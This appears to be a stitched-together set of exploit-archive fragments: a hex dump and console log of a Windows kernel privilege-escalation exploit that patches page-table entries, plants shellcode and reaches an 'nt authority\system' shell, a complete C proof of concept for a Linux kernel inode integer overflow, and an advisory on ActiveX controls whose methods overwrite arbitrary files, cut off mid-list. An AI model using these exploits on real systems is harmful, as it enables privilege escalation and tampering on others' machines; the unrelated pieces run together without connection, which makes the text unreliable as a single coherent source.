000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.
000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......
000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......
000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....
000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............
000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............
000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....
000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....
000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......
000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............
000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....
000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............
000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c.......
000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@..............
000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......
000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......
+] Selected spurious PML4E: fffff67b3d9ecf00
+] Spurious PT: fffff67b3d9e0000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Original HalpIntteruptRequest pointer: fffff80150e1fc40
+] Selected spurious PML4E: fffff67b3d9ecf08
+] Spurious PT: fffff67b3d9e1000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
*** Patching the original location to enable NX...
+] Patching the Spurious Offset with 1967
HAL address: fffff67b3d9e1000
+] w00t: Shellcode stored at: ffffffffffd00d50
+] Selected spurious PML4E: fffff67b3d9ecf10
+] Spurious PT: fffff67b3d9e2000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Patch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\qa\Desktop>
C:\Users\qa\Desktop>whoami
nt authority\system
C:\Users\qa\Desktop>
/* Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoC
The inode is a data structure in a Unix-style file system which describes a filesystem
object such as a file or a directory. Each inode stores the attributes and disk block
locations of the object's data. Filesystem object attributes may include metadata, as
well as owner and permission data.
INODE can be overflowed by mapping a single file too many times, allowing for a local
user to possibly gain root access.
Disclaimer:
This or previous program is for Educational purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the information or functionality provided
by these programs. The author or any Internet provider bears NO responsibility for content
or misuse of these programs or any derivatives thereof. By using these programs you accept
the fac that any damage (dataloss, system crash, system compromise, etc.) caused by the use
of these programs is not Todor Donev's responsibility.
Thanks to Maya Hristova and all friends.
Suggestions,comments and job offers are welcome!
Copyright 2016 (c) Todor Donev
Varna, Bulgaria
todor.donev@gmail.com
https://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
http://pastebin.com/u/hackerscommunity
*/
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
void main(){
int fd, i;
fd = open("/dev/zero", O_RDONLY);
for(i = 0; i < 26999; i++){
mmap((char*)0x00000000 + (0x10000 * i), 1, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
}
}
UCanCode multiple vulnerabilities
Url: http://www.hmi-software.com/
http://www.ucancode.net/index.htm
http://www.ucancode.net/bbs/zhuce/login.htm
Description: Form vendor's web page "UCanCode Software is a Market Leading provider of HMI & SCADA, CAD, UML, GIS, Vector Graphics
and Real Time Data Visualization Graphics Source Code Kits for C/C++ and .NET software developers more than 40 countries
around the world!"
Great... 40 countries. It's time to take a look to their software!
Package name "UCanCode_Controls.zip"
After the installation, we can found these activex controls:
---------------------------------------------
ProgID: UCCVIEWER.UCCViewerCtrl.1
CLSID: {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
---------------------------------------------
ProgID: UCCDRAW.UCCDrawCtrl.1
CLSID: {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
---------------------------------------------
progID: TKDRAWCAD.TKDrawCADCtrl.1
CLSID: {9022B790-B810-45B4-80BC-2D94EEC5343C}
---------------------------------------------
ProgID: UCCPRINT.UCCPrintCtrl.1
CLSID: {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
---------------------------------------------
ProgID: UCCDIAGRAM.UCCDiagramCtrl.1
CLSID: {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
---------------------------------------------
ProgID: UCCUML.UCCUMLCtrl.1
CLSID: {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
---------------------------------------------
ProgID: UCCHMI.UCCHMICtrl.1
CLSID: {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
---------------------------------------------
ProgID: UCCSIMPLE.UCCSIMPLECtrl.1
CLSID: {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
---------------------------------------------
and all are marked as: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------
INSECURE METHODS:
In these coontrols there are a lot of insecure methods which can be used to overwrite
arbitrary files in user's pc. This is the complete list:
1) various Export* methods
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function ExportBitmapData (ByRef phBlob As Long, ByVal imageShape As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
